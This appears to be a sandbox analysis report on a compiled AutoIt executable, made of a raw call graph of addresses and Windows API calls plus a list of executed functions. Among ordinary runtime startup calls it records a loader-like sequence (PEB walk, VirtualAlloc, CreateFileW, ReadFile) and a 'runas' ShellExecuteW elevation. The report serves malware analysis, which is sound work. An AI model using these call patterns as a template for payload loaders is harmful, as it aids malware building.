106127 e27cbf 106128 e27cca 106127->106128 106244 e27da6 58 API calls 3 library calls 106127->106244 106162 e29ae6 106128->106162 106131 e27cd0 106132 e27cdb __RTC_Initialize 106131->106132 106245 e27da6 58 API calls 3 library calls 106131->106245 106183 e2d5d2 106132->106183 106135 e27cea 106136 e27cf6 GetCommandLineW 106135->106136 106246 e27da6 58 API calls 3 library calls 106135->106246 106202 e34f23 GetEnvironmentStringsW 106136->106202 106139 e27cf5 106139->106136 106142 e27d10 106143 e27d1b 106142->106143 106247 e230b5 58 API calls 3 library calls 106142->106247 106212 e34d58 106143->106212 106146 e27d21 106147 e27d2c 106146->106147 106248 e230b5 58 API calls 3 library calls 106146->106248 106226 e230ef 106147->106226 106150 e27d34 106151 e27d3f __wwincmdln 106150->106151 106249 e230b5 58 API calls 3 library calls 106150->106249 106232 e047d0 106151->106232 106154 e27d53 106155 e27d62 106154->106155 106250 e23358 58 API calls _doexit 106154->106250 106251 e230e0 58 API calls _doexit 106155->106251 106158 e27d67 __close 106160 e29e1e 106159->106160 106160->106125 106161->106127 106252 e23187 36 API calls 2 library calls 106162->106252 106164 e29aeb 106253 e29d3c InitializeCriticalSectionAndSpinCount __alloc_osfhnd 106164->106253 106166 e29af0 106167 e29af4 106166->106167 106255 e29d8a TlsAlloc 106166->106255 106254 e29b5c 61 API calls 2 library calls 106167->106254 106170 e29af9 106170->106131 106171 e29b06 106171->106167 106172 e29b11 106171->106172 106256 e287d5 106172->106256 106175 e29b53 106264 e29b5c 61 API calls 2 library calls 106175->106264 106178 e29b58 106178->106131 106179 e29b32 106179->106175 106180 e29b38 106179->106180 106263 e29a33 58 API calls 4 library calls 106180->106263 106182 e29b40 GetCurrentThreadId 106182->106131 106184 e2d5de __close 106183->106184 106185 e29c0b __lock 58 API calls 106184->106185 106186 e2d5e5 106185->106186 106187 e287d5 __calloc_crt 58 API calls 106186->106187 106188 e2d5f6 106187->106188 106189 e2d661 GetStartupInfoW 106188->106189 106190 e2d601 __close @_EH4_CallFilterFunc@8 106188->106190 106196 e2d676 106189->106196 106199 e2d7a5 106189->106199 106190->106135 106191 e2d86d 106278 e2d87d LeaveCriticalSection _doexit 106191->106278 106193 e287d5 __calloc_crt 58 API calls 106193->106196 106194 e2d7f2 GetStdHandle 106194->106199 106195 e2d805 GetFileType 106195->106199 106196->106193 106197 e2d6c4 106196->106197 106196->106199 106198 e2d6f8 GetFileType 106197->106198 106197->106199 106276 e29e2b InitializeCriticalSectionAndSpinCount 106197->106276 106198->106197 106199->106191 106199->106194 106199->106195 106277 e29e2b InitializeCriticalSectionAndSpinCount 106199->106277 106203 e34f34 106202->106203 106204 e27d06 106202->106204 106279 e2881d 58 API calls __malloc_crt 106203->106279 106208 e34b1b GetModuleFileNameW 106204->106208 106206 e34f5a _memmove 106207 e34f70 FreeEnvironmentStringsW 106206->106207 106207->106204 106209 e34b4f _wparse_cmdline 106208->106209 106211 e34b8f _wparse_cmdline 106209->106211 106280 e2881d 58 API calls __malloc_crt 106209->106280 106211->106142 106213 e34d71 __NMSG_WRITE 106212->106213 106217 e34d69 106212->106217 106214 e287d5 __calloc_crt 58 API calls 106213->106214 106222 e34d9a __NMSG_WRITE 106214->106222 106215 e34df1 106216 e22d55 _free 58 API calls 106215->106216 106216->106217 106217->106146 106218 e287d5 __calloc_crt 58 API calls 106218->106222 106219 e34e16 106220 e22d55 _free 58 API calls 106219->106220 106220->106217 106222->106215 106222->106217 106222->106218 106222->106219 106223 e34e2d 106222->106223 106281 e34607 58 API calls __close 106222->106281 106282 e28dc6 IsProcessorFeaturePresent 106223->106282 106225 e34e39 106225->106146 106227 e230fb __IsNonwritableInCurrentImage 106226->106227 106297 e2a4d1 106227->106297 106229 e23119 __initterm_e 106230 e22d40 __cinit 67 API calls 106229->106230 106231 e23138 _doexit __IsNonwritableInCurrentImage 106229->106231 106230->106231 106231->106150 106233 e047ea 106232->106233 106243 e04889 106232->106243 106234 e04824 IsThemeActive 106233->106234 106300 e2336c 106234->106300 106238 e04850 106312 e048fd SystemParametersInfoW SystemParametersInfoW 106238->106312 106240 e0485c 106313 e03b3a 106240->106313 106242 e04864 SystemParametersInfoW 106242->106243 106243->106154 106244->106128 106245->106132 106246->106139 106250->106155 106251->106158 106252->106164 106253->106166 106254->106170 106255->106171 106258 e287dc 106256->106258 106259 e28817 106258->106259 106261 e287fa 106258->106261 106265 e351f6 106258->106265 106259->106175 106262 e29de6 TlsSetValue 106259->106262 106261->106258 106261->106259 106273 e2a132 Sleep 106261->106273 106262->106179 106263->106182 106264->106178 106266 e35201 106265->106266 106271 e3521c 106265->106271 106267 e3520d 106266->106267 106266->106271 106274 e28b28 58 API calls __getptd_noexit 106267->106274 106269 e3522c RtlAllocateHeap 106270 e35212 106269->106270 106269->106271 106270->106258 106271->106269 106271->106270 106275 e233a1 DecodePointer 106271->106275 106273->106261 106274->106270 106275->106271 106276->106197 106277->106199 106278->106190 106279->106206 106280->106211 106281->106222 106283 e28dd1 106282->106283 106288 e28c59 106283->106288 106287 e28dec 106287->106225 106289 e28c73 _memset __call_reportfault 106288->106289 106290 e28c93 IsDebuggerPresent 106289->106290 106296 e2a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 106290->106296 106292 e2c5f6 __fltin2 6 API calls 106293 e28d7a 106292->106293 106295 e2a140 GetCurrentProcess TerminateProcess 106293->106295 106294 e28d57 __call_reportfault 106294->106292 106295->106287 106296->106294 106298 e2a4d4 EncodePointer 106297->106298 106298->106298 106299 e2a4ee 106298->106299 106299->106229 106301 e29c0b __lock 58 API calls 106300->106301 106302 e23377 DecodePointer EncodePointer 106301->106302 106365 e29d75 LeaveCriticalSection 106302->106365 106304 e04849 106305 e233d4 106304->106305 106306 e233f8 106305->106306 106307 e233de 106305->106307 106306->106238 106307->106306 106366 e28b28 58 API calls __getptd_noexit 106307->106366 106309 e233e8 106367 e28db6 9 API calls __close 106309->106367 106311 e233f3 106311->106238 106312->106240 106314 e03b47 __ftell_nolock 106313->106314 106315 e07667 59 API calls 106314->106315 106316 e03b51 GetCurrentDirectoryW 106315->106316 106368 e03766 106316->106368 106318 e03b7a IsDebuggerPresent 106319 e3d272 MessageBoxA 106318->106319 106320 e03b88 106318->106320 106323 e3d28c 106319->106323 106321 e03c61 106320->106321 106320->106323 106324 e03ba5 106320->106324 106322 e03c68 SetCurrentDirectoryW 106321->106322 106325 e03c75 Mailbox 106322->106325 106490 e07213 59 API calls Mailbox 106323->106490 106449 e07285 106324->106449 106325->106242 106328 e3d29c 106334 e3d2b2 SetCurrentDirectoryW 106328->106334 106334->106325 106365->106304 106366->106309 106367->106311 106369 e07667 59 API calls 106368->106369 106370 e0377c 106369->106370 106499 e03d31 106370->106499 106372 e0379a 106373 e04706 61 API calls 106372->106373 106374 e037ae 106373->106374 106375 e07de1 59 API calls 106374->106375 106376 e037bb 106375->106376 106377 e04ddd 136 API calls 106376->106377 106378 e037d4 106377->106378 106379 e3d173 106378->106379 106380 e037dc Mailbox 106378->106380 106552 e6955b 106379->106552 106384 e08047 59 API calls 106380->106384 106383 e3d192 106386 e22d55 _free 58 API calls 106383->106386 106387 e037ef 106384->106387 106385 e04e4a 84 API calls 106385->106383 106388 e3d19f 106386->106388 106513 e0928a 106387->106513 106390 e04e4a 84 API calls 106388->106390 106392 e3d1a8 106390->106392 106396 e03ed0 59 API calls 106392->106396 106393 e07de1 59 API calls 106394 e03808 106393->106394 106395 e084c0 69 API calls 106394->106395 106397 e0381a Mailbox 106395->106397 106398 e3d1c3 106396->106398 106399 e07de1 59 API calls 106397->106399 106400 e03ed0 59 API calls 106398->106400 106401 e03840 106399->106401 106402 e3d1df 106400->106402 106403 e084c0 69 API calls 106401->106403 106404 e04706 61 API calls 106402->106404 106406 e0384f Mailbox 106403->106406 106405 e3d204 106404->106405 106407 e03ed0 59 API calls 106405->106407 106409 e07667 59 API calls 106406->106409 106408 e3d210 106407->106408 106410 e08047 59 API calls 106408->106410 106411 e0386d 106409->106411 106412 e3d21e 106410->106412 106516 e03ed0 106411->106516 106415 e03ed0 59 API calls 106412->106415 106416 e3d22d 106415->106416 106422 e08047 59 API calls 106416->106422 106418 e03887 106418->106392 106419 e03891 106418->106419 106420 e22efd _W_store_winword 60 API calls 106419->106420 106421 e0389c 106420->106421 106421->106398 106423 e038a6 106421->106423 106424 e3d24f 106422->106424 106425 e22efd _W_store_winword 60 API calls 106423->106425 106426 e03ed0 59 API calls 106424->106426 106427 e038b1 106425->106427 106428 e3d25c 106426->106428 106427->106402 106429 e038bb 106427->106429 106428->106428 106430 e22efd _W_store_winword 60 API calls 106429->106430 106431 e038c6 106430->106431 106431->106416 106432 e03907 106431->106432 106434 e03ed0 59 API calls 106431->106434 106432->106416 106433 e03914 106432->106433 106532 e092ce 106433->106532 106436 e038ea 106434->106436 106437 e08047 59 API calls 106436->106437 106439 e038f8 106437->106439 106441 e03ed0 59 API calls 106439->106441 106441->106432 106444 e0928a 59 API calls 106446 e0394f 106444->106446 106445 e08ee0 60 API calls 106445->106446 106446->106444 106446->106445 106447 e03ed0 59 API calls 106446->106447 106448 e03995 Mailbox 106446->106448 106447->106446 106448->106318 106450 e07292 __ftell_nolock 106449->106450 106451 e3ea22 _memset 106450->106451 106452 e072ab 106450->106452 106454 e3ea3e GetOpenFileNameW 106451->106454 106609 e04750 106452->106609 106456 e3ea8d 106454->106456 106458 e07bcc 59 API calls 106456->106458 106460 e3eaa2 106458->106460 106460->106460 106462 e072c9 106637 e0686a 106462->106637 106490->106328 106500 e03d3e __ftell_nolock 106499->106500 106501 e07bcc 59 API calls 106500->106501 106506 e03ea4 Mailbox 106500->106506 106503 e03d70 106501->106503 106502 e079f2 59 API calls 106502->106503 106503->106502 106512 e03da6 Mailbox 106503->106512 106504 e079f2 59 API calls 106504->106512 106505 e03e77 106505->106506 106507 e07de1 59 API calls 106505->106507 106506->106372 106509 e03e98 106507->106509 106508 e07de1 59 API calls 106508->106512 106510 e03f74 59 API calls 106509->106510 106510->106506 106512->106504 106512->106505 106512->106506 106512->106508 106587 e03f74 106512->106587 106514 e20db6 Mailbox 59 API calls 106513->106514 106515 e037fb 106514->106515 106515->106393 106517 e03ef3 106516->106517 106518 e03eda 106516->106518 106520 e07bcc 59 API calls 106517->106520 106519 e08047 59 API calls 106518->106519 106521 e03879 106519->106521 106520->106521 106522 e22efd 106521->106522 106523 e22f09 106522->106523 106524 e22f7e 106522->106524 106531 e22f2e 106523->106531 106593 e28b28 58 API calls __getptd_noexit 106523->106593 106595 e22f90 60 API calls 3 library calls 106524->106595 106527 e22f8b 106527->106418 106528 e22f15 106594 e28db6 9 API calls __close 106528->106594 106530 e22f20 106530->106418 106531->106418 106533 e092d6 106532->106533 106534 e20db6 Mailbox 59 API calls 106533->106534 106535 e092e4 106534->106535 106536 e03924 106535->106536 106596 e091fc 59 API calls Mailbox 106535->106596 106538 e09050 106536->106538 106597 e09160 106538->106597 106540 e20db6 Mailbox 59 API calls 106541 e03932 106540->106541 106543 e08ee0 106541->106543 106542 e0905f 106542->106540 106542->106541 106544 e3f17c 106543->106544 106546 e08ef7 106543->106546 106544->106546 106607 e08bdb 59 API calls Mailbox 106544->106607 106547 e09040 106546->106547 106548 e08ff8 106546->106548 106551 e08fff 106546->106551 106606 e09d3c 60 API calls Mailbox 106547->106606 106550 e20db6 Mailbox 59 API calls 106548->106550 106550->106551 106551->106446 106553 e04ee5 85 API calls 106552->106553 106554 e695ca 106553->106554 106555 e69734 96 API calls 106554->106555 106556 e695dc 106555->106556 106557 e04f0b 74 API calls 106556->106557 106585 e3d186 106556->106585 106558 e695f7 106557->106558 106559 e04f0b 74 API calls 106558->106559 106560 e69607 106559->106560 106561 e04f0b 74 API calls 106560->106561 106562 e69622 106561->106562 106563 e04f0b 74 API calls 106562->106563 106564 e6963d 106563->106564 106565 e04ee5 85 API calls 106564->106565 106566 e69654 106565->106566 106567 e2571c __malloc_crt 58 API calls 106566->106567 106568 e6965b 106567->106568 106569 e2571c __malloc_crt 58 API calls 106568->106569 106570 e69665 106569->106570 106571 e04f0b 74 API calls 106570->106571 106572 e69679 106571->106572 106573 e69109 GetSystemTimeAsFileTime 106572->106573 106574 e6968c 106573->106574 106575 e696b6 106574->106575 106576 e696a1 106574->106576 106577 e696bc 106575->106577 106578 e6971b 106575->106578 106579 e22d55 _free 58 API calls 106576->106579 106608 e68b06 116 API calls __fcloseall 106577->106608 106582 e22d55 _free 58 API calls 106578->106582 106580 e696a7 106579->106580 106583 e22d55 _free 58 API calls 106580->106583 106582->106585 106583->106585 106584 e69713 106586 e22d55 _free 58 API calls 106584->106586 106585->106383 106585->106385 106586->106585 106588 e03f82 106587->106588 106592 e03fa4 _memmove 106587->106592 106591 e20db6 Mailbox 59 API calls 106588->106591 106589 e20db6 Mailbox 59 API calls 106590 e03fb8 106589->106590 106590->106512 106591->106592 106592->106589 106593->106528 106594->106530 106595->106527 106596->106536 106598 e09169 Mailbox 106597->106598 106599 e3f19f 106598->106599 106604 e09173 106598->106604 106601 e20db6 Mailbox 59 API calls 106599->106601 106600 e0917a 106600->106542 106602 e3f1ab 106601->106602 106604->106600 106605 e09c90 59 API calls Mailbox 106604->106605 106605->106604 106606->106551 106607->106546 106608->106584 106671 e31940 106609->106671 106612 e04799 106614 e07d8c 59 API calls 106612->106614 106613 e0477c 106615 e07bcc 59 API calls 106613->106615 106616 e04788 106614->106616 106615->106616 106673 e07726 106616->106673 106619 e20791 106620 e2079e __ftell_nolock 106619->106620 106621 e2079f GetLongPathNameW 106620->106621 106622 e07bcc 59 API calls 106621->106622 106623 e072bd 106622->106623 106624 e0700b 106623->106624 106625 e07667 59 API calls 106624->106625 106626 e0701d 106625->106626 106627 e04750 60 API calls 106626->106627 106628 e07028 106627->106628 106629 e07033 106628->106629 106635 e3e885 106628->106635 106630 e03f74 59 API calls 106629->106630 106632 e0703f 106630->106632 106677 e034c2 106632->106677 106634 e3e89f 106635->106634 106683 e07908 61 API calls 106635->106683 106636 e07052 Mailbox 106636->106462 106638 e04ddd 136 API calls 106637->106638 106639 e0688f 106638->106639 106640 e3e031 106639->106640 106642 e04ddd 136 API calls 106639->106642 106641 e6955b 122 API calls 106640->106641 106643 e3e046 106641->106643 106644 e068a3 106642->106644 106645 e3e067 106643->106645 106646 e3e04a 106643->106646 106644->106640 106647 e068ab 106644->106647 106649 e20db6 Mailbox 59 API calls 106645->106649 106648 e04e4a 84 API calls 106646->106648 106650 e3e052 106647->106650 106651 e068b7 106647->106651 106648->106650 106670 e3e0ac Mailbox 106649->106670 106783 e642f8 90 API calls _wprintf 106650->106783 106684 e06a8c 106651->106684 106655 e3e060 106655->106645 106672 e0475d GetFullPathNameW 106671->106672 106672->106612 106672->106613 106674 e07734 106673->106674 106675 e07d2c 59 API calls 106674->106675 106676 e04794 106675->106676 106676->106619 106678 e034d4 106677->106678 106682 e034f3 _memmove 106677->106682 106680 e20db6 Mailbox 59 API calls 106678->106680 106679 e20db6 Mailbox 59 API calls 106681 e0350a 106679->106681 106680->106682 106681->106636 106682->106679 106683->106635 106685 e06ab5 106684->106685 106686 e3e41e 106684->106686 106783->106655 106889 e01055 106894 e02649 106889->106894 106892 e22d40 __cinit 67 API calls 106893 e01064 106892->106893 106895 e07667 59 API calls 106894->106895 106896 e026b7 106895->106896 106901 e03582 106896->106901 106899 e02754 106900 e0105a 106899->106900 106904 e03416 59 API calls 2 library calls 106899->106904 106900->106892 106905 e035b0 106901->106905 106904->106899 106906 e035bd 106905->106906 106907 e035a1 106905->106907 106906->106907 106908 e035c4 RegOpenKeyExW 106906->106908 106907->106899 106908->106907 106909 e035de RegQueryValueExW 106908->106909 106910 e03614 RegCloseKey 106909->106910 106911 e035ff 106909->106911 106910->106907 106911->106910 106912 10501f3 106915 104fe68 106912->106915 106914 105023f 106916 104d898 GetPEB 106915->106916 106917 104ff07 106916->106917 106920 104ff61 VirtualAlloc 106917->106920 106925 104ff45 106917->106925 106926 1050068 CloseHandle 106917->106926 106927 1050078 VirtualFree 106917->106927 106928 1050d78 GetPEB 106917->106928 106919 104ff38 CreateFileW 106919->106917 106919->106925 106921 104ff82 ReadFile 106920->106921 106920->106925 106924 104ffa0 VirtualAlloc 106921->106924 106921->106925 106922 1050154 VirtualFree 106923 1050162 106922->106923 106923->106914 106924->106917 106924->106925 106925->106922 106925->106923 106926->106917 106927->106917 106929 1050da2 106928->106929 106929->106919 106930 e01016 106935 e04974 106930->106935 106933 e22d40 __cinit 67 API calls 106934 e01025 106933->106934 106936 e20db6 Mailbox 59 API calls 106935->106936 106937 e0497c 106936->106937 106938 e0101b 106937->106938 106942 e04936 106937->106942 106938->106933 106943 e04951 106942->106943 106944 e0493f 106942->106944 106946 e049a0 106943->106946 106945 e22d40 __cinit 67 API calls 106944->106945 106945->106943 106947 e07667 59 API calls 106946->106947 106948 e049b8 GetVersionExW 106947->106948 106949 e07bcc 59 API calls 106948->106949 106950 e049fb 106949->106950 106951 e07d2c 59 API calls 106950->106951 106960 e04a28 106950->106960 106952 e04a1c 106951->106952 106953 e07726 59 API calls 106952->106953 106953->106960 106954 e04a93 GetCurrentProcess IsWow64Process 106955 e04aac 106954->106955 106957 e04ac2 106955->106957 106958 e04b2b GetSystemInfo 106955->106958 106956 e3d864 106970 e04b37 106957->106970 106959 e04af8 106958->106959 106959->106938 106960->106954 106960->106956 106963 e04ad4 106965 e04b37 2 API calls 106963->106965 106964 e04b1f GetSystemInfo 106966 e04ae9 106964->106966 106967 e04adc GetNativeSystemInfo 106965->106967 106966->106959 106968 e04aef FreeLibrary 106966->106968 106967->106966 106968->106959 106971 e04ad0 106970->106971 106972 e04b40 LoadLibraryA 106970->106972 106971->106963 106971->106964 106972->106971 106973 e04b51 GetProcAddress 106972->106973 106973->106971 106974 e0be19 106975 e0c36a 106974->106975 106976 e0be22 106974->106976 106984 e0ba8b Mailbox 106975->106984 106989 e57bdb 59 API calls _memmove 106975->106989 106976->106975 106977 e09837 84 API calls 106976->106977 106978 e0be4d 106977->106978 106978->106975 106980 e0be5d 106978->106980 106982 e07a51 59 API calls 106980->106982 106981 e41085 106983 e08047 59 API calls 106981->106983 106982->106984 106983->106984 106986 e41361 106984->106986 106988 e0baab 106984->106988 106991 e08cd4 59 API calls Mailbox 106984->106991 106986->106988 106990 e23d46 59 API calls __wtof_l 106986->106990 106989->106981 106990->106988 106991->106984 106992 e0107d 106997 e0708b 106992->106997 106994 e0108c 106995 e22d40 __cinit 67 API calls 106994->106995 106996 e01096 106995->106996 106998 e0709b __ftell_nolock 106997->106998 106999 e07667 59 API calls 106998->106999 107000 e07151 106999->107000 107001 e04706 61 API calls 107000->107001 107002 e0715a 107001->107002 107028 e2050b 107002->107028 107005 e07cab 59 API calls 107006 e07173 107005->107006 107007 e03f74 59 API calls 107006->107007 107008 e07182 107007->107008 107009 e07667 59 API calls 107008->107009 107010 e0718b 107009->107010 107011 e07d8c 59 API calls 107010->107011 107012 e07194 RegOpenKeyExW 107011->107012 107013 e3e8b1 RegQueryValueExW 107012->107013 107017 e071b6 Mailbox 107012->107017 107014 e3e943 RegCloseKey 107013->107014 107015 e3e8ce 107013->107015 107014->107017 107027 e3e955 _wcscat Mailbox __NMSG_WRITE 107014->107027 107016 e20db6 Mailbox 59 API calls 107015->107016 107018 e3e8e7 107016->107018 107017->106994 107019 e0522e 59 API calls 107018->107019 107020 e3e8f2 RegQueryValueExW 107019->107020 107021 e3e90f 107020->107021 107024 e3e929 107020->107024 107022 e07bcc 59 API calls 107021->107022 107022->107024 107023 e079f2 59 API calls 107023->107027 107024->107014 107025 e07de1 59 API calls 107025->107027 107026 e03f74 59 API calls 107026->107027 107027->107017 107027->107023 107027->107025 107027->107026 107029 e31940 __ftell_nolock 107028->107029 107030 e20518 GetFullPathNameW 107029->107030 107031 e2053a 107030->107031 107032 e07bcc 59 API calls 107031->107032 107033 e07165 107032->107033 107033->107005 107034 e3fdfc 107073 e0ab30 Mailbox _memmove 107034->107073 107036 e5617e Mailbox 59 API calls 107058 e0a057 107036->107058 107040 e0b525 107137 e69e4a 89 API calls 4 library calls 107040->107137 107041 e40055 107136 e69e4a 89 API calls 4 library calls 107041->107136 107042 e20db6 59 API calls Mailbox 107060 e09f37 Mailbox 107042->107060 107043 e0b900 60 API calls 107043->107060 107044 e0b475 107049 e08047 59 API calls 107044->107049 107047 e08047 59 API calls 107047->107060 107048 e40064 107049->107058 107051 e0b47a 107051->107041 107062 e409e5 107051->107062 107054 e07667 59 API calls 107054->107060 107055 e56e8f 59 API calls 107055->107060 107056 e22d40 67 API calls __cinit 107056->107060 107057 e07de1 59 API calls 107057->107073 107059 e409d6 107141 e69e4a 89 API calls 4 library calls 107059->107141 107060->107041 107060->107042 107060->107043 107060->107044 107060->107047 107060->107051 107060->107054 107060->107055 107060->107056 107060->107058 107060->107059 107063 e0a55a 107060->107063 107130 e0c8c0 331 API calls 2 library calls 107060->107130 107142 e69e4a 89 API calls 4 library calls 107062->107142 107140 e69e4a 89 API calls 4 library calls 107063->107140 107064 e7bc6b 331 API calls 107064->107073 107066 e20db6 59 API calls Mailbox 107066->107073 107067 e0b2b6 107134 e0f6a3 331 API calls 107067->107134 107069 e09ea0 331 API calls 107069->107073 107070 e4086a 107138 e09c90 59 API calls Mailbox 107070->107138 107072 e40878 107139 e69e4a 89 API calls 4 library calls 107072->107139 107073->107040 107073->107057 107073->107058 107073->107060 107073->107064 107073->107066 107073->107067 107073->107069 107073->107070 107073->107072 107075 e4085c 107073->107075 107076 e0b21c 107073->107076 107080 e56e8f 59 API calls 107073->107080 107083 e7df37 107073->107083 107086 e7df23 107073->107086 107089 e7c2e0 107073->107089 107121 e67956 107073->107121 107127 e5617e 107073->107127 107131 e09c90 59 API calls Mailbox 107073->107131 107135 e7c193 85 API calls 2 library calls 107073->107135 107075->107036 107075->107058 107132 e09d3c 60 API calls Mailbox 107076->107132 107078 e0b22d 107133 e09d3c 60 API calls Mailbox 107078->107133 107080->107073 107143 e7cadd 107083->107143 107085 e7df47 107085->107073 107087 e7cadd 130 API calls 107086->107087 107088 e7df33 107087->107088 107088->107073 107090 e07667 59 API calls 107089->107090 107091 e7c2f4 107090->107091 107092 e07667 59 API calls 107091->107092 107093 e7c2fc 107092->107093 107094 e07667 59 API calls 107093->107094 107095 e7c304 107094->107095 107096 e09837 84 API calls 107095->107096 107097 e7c312 107096->107097 107098 e7c528 Mailbox 107097->107098 107099 e07bcc 59 API calls 107097->107099 107100 e7c4fb 107097->107100 107102 e7c4e2 107097->107102 107104 e07924 59 API calls 107097->107104 107105 e7c4fd 107097->107105 107106 e08047 59 API calls 107097->107106 107111 e07e4f 59 API calls 107097->107111 107114 e07e4f 59 API calls 107097->107114 107118 e09837 84 API calls 107097->107118 107119 e07cab 59 API calls 107097->107119 107120 e07b2e 59 API calls 107097->107120 107098->107073 107099->107097 107100->107098 107235 e09a3c 59 API calls Mailbox 107100->107235 107103 e07cab 59 API calls 107102->107103 107107 e7c4ef 107103->107107 107104->107097 107108 e07cab 59 API calls 107105->107108 107106->107097 107109 e07b2e 59 API calls 107107->107109 107110 e7c50c 107108->107110 107109->107100 107113 e07b2e 59 API calls 107110->107113 107112 e7c3a9 CharUpperBuffW 107111->107112 107233 e0843a 68 API calls 107112->107233 107113->107100 107116 e7c469 CharUpperBuffW 107114->107116 107234 e0c5a7 69 API calls 2 library calls 107116->107234 107118->107097 107119->107097 107120->107097 107122 e67962 107121->107122 107123 e20db6 Mailbox 59 API calls 107122->107123 107124 e67970 107123->107124 107125 e6797e 107124->107125 107126 e07667 59 API calls 107124->107126 107125->107073 107126->107125 107236 e560c0 107127->107236 107129 e5618c 107129->107073 107130->107060 107131->107073 107132->107078 107133->107067 107134->107040 107135->107073 107136->107048 107137->107075 107138->107075 107139->107075 107140->107058 107141->107062 107142->107058 107144 e09837 84 API calls 107143->107144 107145 e7cb1a 107144->107145 107168 e7cb61 Mailbox 107145->107168 107181 e7d7a5 107145->107181 107147 e7cdb9 107148 e7cf2e 107147->107148 107153 e7cdc7 107147->107153 107220 e7d8c8 92 API calls Mailbox 107148->107220 107151 e7cf3d 107151->107153 107154 e7cf49 107151->107154 107152 e09837 84 API calls 107169 e7cbb2 Mailbox 107152->107169 107194 e7c96e 107153->107194 107154->107168 107159 e7ce00 107209 e20c08 107159->107209 107162 e7ce33 107165 e092ce 59 API calls 107162->107165 107163 e7ce1a 107215 e69e4a 89 API calls 4 library calls 107163->107215 107167 e7ce3f 107165->107167 107166 e7ce25 GetCurrentProcess TerminateProcess 107166->107162 107170 e09050 59 API calls 107167->107170 107168->107085 107169->107147 107169->107152 107169->107168 107213 e7fbce 59 API calls 2 library calls 107169->107213 107214 e7cfdf 61 API calls 2 library calls 107169->107214 107171 e7ce55 107170->107171 107180 e7ce7c 107171->107180 107216 e08d40 59 API calls Mailbox 107171->107216 107172 e7cfa4 107172->107168 107177 e7cfb8 FreeLibrary 107172->107177 107174 e7ce6b 107217 e7d649 107 API calls _free 107174->107217 107177->107168 107180->107172 107218 e08d40 59 API calls Mailbox 107180->107218 107219 e09d3c 60 API calls Mailbox 107180->107219 107221 e7d649 107 API calls _free 107180->107221 107182 e07e4f 59 API calls 107181->107182 107183 e7d7c0 CharLowerBuffW 107182->107183 107222 e5f167 107183->107222 107187 e07667 59 API calls 107188 e7d7f9 107187->107188 107189 e0784b 59 API calls 107188->107189 107190 e7d810 107189->107190 107191 e07d2c 59 API calls 107190->107191 107192 e7d81c Mailbox 107191->107192 107193 e7d858 Mailbox 107192->107193 107229 e7cfdf 61 API calls 2 library calls 107192->107229 107193->107169 107195 e7c989 107194->107195 107199 e7c9de 107194->107199 107196 e20db6 Mailbox 59 API calls 107195->107196 107197 e7c9ab 107196->107197 107198 e20db6 Mailbox 59 API calls 107197->107198 107197->107199 107198->107197 107200 e7da50 107199->107200 107201 e7dc79 Mailbox 107200->107201 107208 e7da73 _strcat _wcscpy __NMSG_WRITE 107200->107208 107201->107159 107202 e09b3c 59 API calls 107202->107208 107203 e09be6 59 API calls 107203->107208 107204 e09b98 59 API calls 107204->107208 107205 e09837 84 API calls 107205->107208 107206 e2571c 58 API calls __malloc_crt 107206->107208 107208->107201 107208->107202 107208->107203 107208->107204 107208->107205 107208->107206 107232 e65887 61 API calls 2 library calls 107208->107232 107212 e20c1d 107209->107212 107210 e20cb5 VirtualProtect 107211 e20c83 107210->107211 107211->107162 107211->107163 107212->107210 107212->107211 107213->107169 107214->107169 107215->107166 107216->107174 107217->107180 107218->107180 107219->107180 107220->107151 107221->107180 107223 e5f192 __NMSG_WRITE 107222->107223 107224 e5f1d1 107223->107224 107227 e5f1c7 107223->107227 107228 e5f278 107223->107228 107224->107187 107224->107192 107227->107224 107230 e078c4 61 API calls 107227->107230 107228->107224 107231 e078c4 61 API calls 107228->107231 107229->107193 107230->107227 107231->107228 107232->107208 107233->107097 107234->107097 107235->107098 107237 e560e8 107236->107237 107238 e560cb 107236->107238 107237->107129 107238->107237 107240 e560ab 59 API calls Mailbox 107238->107240 107240->107238

                                                                      Executed Functions

                                                                      Function 00E03B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153windowCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E03B68
                                                                      • IsDebuggerPresent.KERNEL32 ref: 00E03B7A
                                                                      • GetFullPathNameW.KERNEL32(00007FFF,?,?,00EC52F8,00EC52E0,?,?), ref: 00E03BEB
                                                                        • Part of subcall function 00E07BCC: _memmove.LIBCMT ref: 00E07C06
                                                                        • Part of subcall function 00E1092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00E03C14,00EC52F8,?,?,?), ref: 00E1096E
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00E03C6F
                                                                      • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00EB7770,00000010), ref: 00E3D281
                                                                      • SetCurrentDirectoryW.KERNEL32(?,00EC52F8,?,?,?), ref: 00E3D2B9
                                                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00EB4260,00EC52F8,?,?,?), ref: 00E3D33F
                                                                      • ShellExecuteW.SHELL32(00000000,?,?), ref: 00E3D346
                                                                        • Part of subcall function 00E03A46: GetSysColorBrush.USER32(0000000F), ref: 00E03A50
                                                                        • Part of subcall function 00E03A46: LoadCursorW.USER32(00000000,00007F00), ref: 00E03A5F
                                                                        • Part of subcall function 00E03A46: LoadIconW.USER32(00000063), ref: 00E03A76
                                                                        • Part of subcall function 00E03A46: LoadIconW.USER32(000000A4), ref: 00E03A88
                                                                        • Part of subcall function 00E03A46: LoadIconW.USER32(000000A2), ref: 00E03A9A
                                                                        • Part of subcall function 00E03A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E03AC0
                                                                        • Part of subcall function 00E03A46: RegisterClassExW.USER32(?), ref: 00E03B16
                                                                        • Part of subcall function 00E039D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E03A03
                                                                        • Part of subcall function 00E039D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E03A24
                                                                        • Part of subcall function 00E039D5: ShowWindow.USER32(00000000,?,?), ref: 00E03A38
                                                                        • Part of subcall function 00E039D5: ShowWindow.USER32(00000000,?,?), ref: 00E03A41
                                                                        • Part of subcall function 00E0434A: _memset.LIBCMT ref: 00E04370
                                                                        • Part of subcall function 00E0434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E04415
